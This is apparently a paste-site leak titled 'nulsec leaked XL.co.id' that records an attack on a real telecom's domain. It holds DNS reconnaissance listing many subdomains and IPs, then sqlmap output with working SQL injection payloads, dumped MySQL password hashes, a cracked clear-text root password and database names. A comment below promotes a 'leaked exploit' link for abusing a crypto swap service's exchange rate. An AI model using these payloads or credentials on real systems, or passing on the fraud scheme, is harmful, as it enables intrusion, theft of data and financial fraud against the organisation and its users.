b3gund4L icon

./nulsec leaked XL.co.id

b3gund4L | PRO | 04/30/17 09:09:24 AM UTC | 0 ⭐ | 41472 👁️ | Never ⏰ | []
SQL |

8.5 KB

|

None

|

0 👍

/

0 👎

[+] Getting nameservers
112.215.37.183 - snbdc-dns2.xl.net.id
202.152.254.245 - socrates.xl.net.id
112.215.37.182 - snbdc-dns1.xl.net.id
202.152.254.246 - hertz.xl.net.id
[-] Zone transfer failed
 
[+] IPv6 (AAAA) records found. Try running dnscan WITH the -6 OPTION.
64:ff9b::ca98:e052
 
64:ff9c::ca98:e052
 
[+] TXT records found
"MS=ms58499430"
"GcWtvXH+AYzV4ipe+0/Si1oaUaRK3weetfWln/QjMkrIQvzFUFq9QUlfMieX84hd4JAfkyfv+Y1bXCohqirTxQ=="
"v=spf1 mx:xl.co.id  ip4:208.74.204.5 ip4:208.74.204.9 include:spf.protection.outlook.com -all"
 
[+] MX records found, added TO target list
50 mail3.xl.co.id.
50 mail4.xl.co.id.
10 mail1.xl.co.id.
10 mail2.xl.co.id.
 
[*] Scanning xl.co.id FOR A records
202.152.224.136 - webmail.xl.co.id              
202.152.224.82 - xl.co.id
202.152.224.82 - www.xl.co.id                 
202.152.254.245 - ns1.xl.co.id                     
112.215.37.178 - ns2.xl.co.id
202.152.224.82 - m.xl.co.id                      
132.245.43.120 - autodiscover.xl.co.id     
40.100.20.8 - autodiscover.xl.co.id
40.100.16.24 - autodiscover.xl.co.id
40.100.17.24 - autodiscover.xl.co.id
132.245.254.88 - autodiscover.xl.co.id
40.96.2.136 - autodiscover.xl.co.id
40.100.0.200 - autodiscover.xl.co.id
40.100.54.200 - autodiscover.xl.co.id
132.245.69.40 - autodiscover.xl.co.id
202.152.224.63 - mail2.xl.co.id               
202.152.254.249 - www1.xl.co.id                
202.152.254.249 - portal.xl.co.id           
65.49.33.90 - video.xl.co.id
112.215.105.11 - my.xl.co.id                  
202.153.129.73 - wap.xl.co.id               
202.152.224.8 - mail1.xl.co.id             
202.152.224.29 - ads.xl.co.id                
202.152.224.152 - apps.xl.co.id                    
52.113.64.139 - sip.xl.co.id                
202.152.224.137 - mail3.xl.co.id                 
52.112.66.14 - lyncdiscover.xl.co.id        
112.215.105.53 - service.xl.co.id              
202.152.224.82 - cloud.xl.co.id                
112.215.81.228 - CONNECT.xl.co.id                           
112.215.105.25 - speedtest.xl.co.id             
202.152.254.249 - sso.xl.co.id                     
202.152.224.138 - mail4.xl.co.id              
13.67.50.225 - msoid.xl.co.id              
23.100.112.64 - msoid.xl.co.id
13.67.50.226 - msoid.xl.co.id
202.152.224.30 - sslvpn.xl.co.id                 
202.152.224.135 - corp.xl.co.id            
54.251.37.78 - love.xl.co.id                      
202.152.224.60 - corporate.xl.co.id               
202.152.224.91 - life.xl.co.id                      
106.187.45.75 - ems.xl.co.id                         
202.152.224.92 - play.xl.co.id                
202.152.224.169 - mp.xl.co.id                      
202.152.224.167 - ims.xl.co.id                    
128.199.250.248 - wow.xl.co.id                        
202.152.224.167 - youth.xl.co.id                  
202.152.224.29 - ads2.xl.co.id                   
202.152.224.183 - front.xl.co.id                 
23.92.53.225 - gm.xl.co.id                          
202.152.224.162 - sipexternal.xl.co.id            
112.215.105.11 - 123.xl.co.id                   
54.255.130.217 - awards.xl.co.id                
119.235.30.33 - csr.xl.co.id                       
202.152.224.190 - ics.xl.co.id                   
112.215.105.46 - bpm.xl.co.id                      
112.215.105.62 - hc.xl.co.id                                  
202.152.224.165 - failover.xl.co.id                           
202.152.224.148 - test123.xl.co.id                           
112.215.105.59 - smt.xl.co.id                        
184.82.232.192 - east.xl.co.id                    
202.152.224.192 - prm.xl.co.id                      
202.153.129.73 - wap1.xl.co.id                      
202.152.224.89 - spc.xl.co.id                        
202.152.224.163 - rproxy.xl.co.id                    
202.152.224.152 - tower.xl.co.id                     
112.215.105.16 - ccp.xl.co.id                         
202.152.224.196 - karaoke.xl.co.id                   
202.152.224.222 - rbt.xl.co.id                        
202.152.224.82 - m2m.xl.co.id                                
202.152.224.76 - mbm.xl.co.id                              
112.215.105.63 - registrasi.xl.co.id 
 
 
Parameter: NUMBER (GET)
    TYPE: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY OR GROUP BY clause
    Payload: NUMBER=87829465777' RLIKE (SELECT (CASE WHEN (4494=4494) THEN 87829465777 ELSE 0x28 END)) AND 'QuLr'='QuLr&id=0
 
    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY OR GROUP BY clause (FLOOR)
    Payload: NUMBER=87829465777' AND (SELECT 2323 FROM(SELECT COUNT(*),CONCAT(0x7171626271,(SELECT (ELT(2323=2323,1))),0x71627a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZsEV'='ZsEV&id=0
---
[15:10:01] [INFO] the back-END DBMS IS MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-END DBMS: MySQL >= 5.0
[15:10:01] [INFO] fetching server hostname
[15:10:01] [INFO] resumed: xl1
hostname:    'xl1'
[15:10:01] [INFO] fetching DATABASE users password hashes
[15:10:01] [INFO] the SQL query used RETURNS 13 entries
[15:10:01] [INFO] retrieved: bubble
[15:10:01] [INFO] retrieved: *748C78DA84266E6825ADDF0887831A044D52CC0B
[15:10:01] [INFO] retrieved: root
[15:10:01] [INFO] retrieved: *748C78DA84266E6825ADDF0887831A044D52CC0B
[15:10:01] [INFO] retrieved: support
[15:10:01] [INFO] retrieved: *748C78DA84266E6825ADDF0887831A044D52CC0B
[15:10:01] [INFO] retrieved: root
[15:10:01] [INFO] retrieved:
[15:10:01] [INFO] retrieved: root
[15:10:01] [INFO] retrieved:
[15:10:01] [INFO] retrieved: support
[15:10:01] [INFO] retrieved: *748C78DA84266E6825ADDF0887831A044D52CC0B
[15:10:01] [INFO] retrieved: root
[15:10:01] [INFO] retrieved: *748C78DA84266E6825ADDF0887831A044D52CC0B
[15:10:02] [INFO] retrieved:
[15:10:02] [INFO] retrieved: *748C78DA84266E6825ADDF0887831A044D52CC0B
[15:10:02] [INFO] retrieved: bubble
[15:10:02] [INFO] retrieved: *13F84CC62636F799FE455B4B4BD45DB6C02F599B
[15:10:02] [INFO] retrieved: root
[15:10:02] [INFO] retrieved: *13F84CC62636F799FE455B4B4BD45DB6C02F599B
[15:10:02] [INFO] retrieved: support
[15:10:02] [INFO] retrieved: *13F84CC62636F799FE455B4B4BD45DB6C02F599B
[15:10:02] [INFO] retrieved:
[15:10:02] [INFO] retrieved: *894A0E091E1CD901CAEF2983002F13A99BCD6DC2
[15:10:02] [INFO] retrieved: root
[15:10:02] [INFO] retrieved: *894A0E091E1CD901CAEF2983002F13A99BCD6DC2
do you want TO store hashes TO a TEMPORARY file FOR eventual further processing WITH other tools [y/N] y
[15:10:04] [INFO] writing hashes TO a TEMPORARY file '/tmp/sqlmap1Gc3oR11142/sqlmaphashes-UcVruc.txt'
do you want TO perform a dictionary-based attack against retrieved password hashes? [Y/n/q]
[15:10:06] [INFO] USING hash method 'mysql_passwd'
what dictionary do you want TO USE?
[1] DEFAULT dictionary file '/root/.cache/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file WITH list OF dictionary files
>
[15:10:07] [INFO] USING DEFAULT dictionary
do you want TO USE common password suffixes? (slow!) [y/N]
[15:10:09] [INFO] starting dictionary-based cracking (mysql_passwd)
[15:10:09] [INFO] starting 4 processes
[15:10:31] [INFO] cracked password 'support' FOR USER 'root'
DATABASE management system users password hashes:
[*] bubble [2]:
    password hash: *13F84CC62636F799FE455B4B4BD45DB6C02F599B
    clear-text password: support
    password hash: *748C78DA84266E6825ADDF0887831A044D52CC0B
[*] root [4]:
    password hash: *13F84CC62636F799FE455B4B4BD45DB6C02F599B
    clear-text password: support
    password hash: *748C78DA84266E6825ADDF0887831A044D52CC0B
    password hash: *894A0E091E1CD901CAEF2983002F13A99BCD6DC2
    password hash: NULL
[*] support [2]:
    password hash: *13F84CC62636F799FE455B4B4BD45DB6C02F599B
    clear-text password: support
    password hash: *748C78DA84266E6825ADDF0887831A044D52CC0B
 
 
 
[15:11:32] [INFO] the back-END DBMS IS MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-END DBMS: MySQL >= 5.0
[15:11:32] [INFO] fetching CURRENT USER
[15:11:32] [INFO] retrieved: root@%
CURRENT USER:    'root@%'
[15:11:32] [INFO] fetching CURRENT DATABASE
[15:11:32] [INFO] retrieved: db_bblog
CURRENT DATABASE:    'db_bblog'
[15:11:32] [INFO] fetching server hostname
[15:11:32] [INFO] resumed: xl1
hostname:    'xl1'
 
 
 
available DATABASES [10]:
[*] backup
[*] db_bblog
[*] db_bcare
[*] db_bcore
[*] db_support
[*] information_schema
[*] mcurium
[*] mysql
[*] test
[*] web
151.101.8.133

Comments

  •  icon
    01/01/70 12:00:00 AM UTC
    Plain Text |

    0 B

    |

    👍

    /

    👎

    
        
  • unknown_SDVY icon
    02/10/26 11:39:32 AM UTC
    CSS |

    0 B

    |

    0 👍

    /

    0 👎

    ✅ Leaked Exploit Documentation:
     
    https://rawtext.host/raw?44lh4m
     
    This made me $13,000 in 2 days.
     
    Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 38% — they will simply correct the exchange rate.
    The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
     
    Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without any verification from Swapzone — instant swap).
    
  •  icon
    01/01/70 12:00:00 AM UTC
    Plain Text |

    0 B

    |

    👍

    /

    👎

    
        
  •  icon
    01/01/70 12:00:00 AM UTC
    Plain Text |

    0 B

    |

    👍

    /

    👎

    
        
  •  icon
    01/01/70 12:00:00 AM UTC
    Plain Text |

    0 B

    |

    👍

    /

    👎

    
        
  •  icon
    01/01/70 12:00:00 AM UTC
    Plain Text |

    0 B

    |

    👍

    /

    👎

    
        
  •  icon
    01/01/70 12:00:00 AM UTC
    Plain Text |

    0 B

    |

    👍

    /

    👎

    
        
  •  icon
    01/01/70 12:00:00 AM UTC
    Plain Text |

    0 B

    |

    👍

    /

    👎

    
        
  •  icon
    01/01/70 12:00:00 AM UTC
    Plain Text |

    0 B

    |

    👍

    /

    👎

    
        
  •  icon
    01/01/70 12:00:00 AM UTC
    Plain Text |

    0 B

    |

    👍

    /

    👎

    
        
  •  icon
    01/01/70 12:00:00 AM UTC
    Plain Text |

    0 B

    |

    👍

    /

    👎

    
        
  •  icon
    01/01/70 12:00:00 AM UTC
    Plain Text |

    0 B

    |

    👍

    /

    👎

    
        
  •  icon
    01/01/70 12:00:00 AM UTC
    Plain Text |

    0 B

    |

    👍

    /

    👎

    
        
  •  icon
    01/01/70 12:00:00 AM UTC
    Plain Text |

    0 B

    |

    👍

    /

    👎

    
        
  •  icon
    01/01/70 12:00:00 AM UTC
    Plain Text |

    0 B

    |

    👍

    /

    👎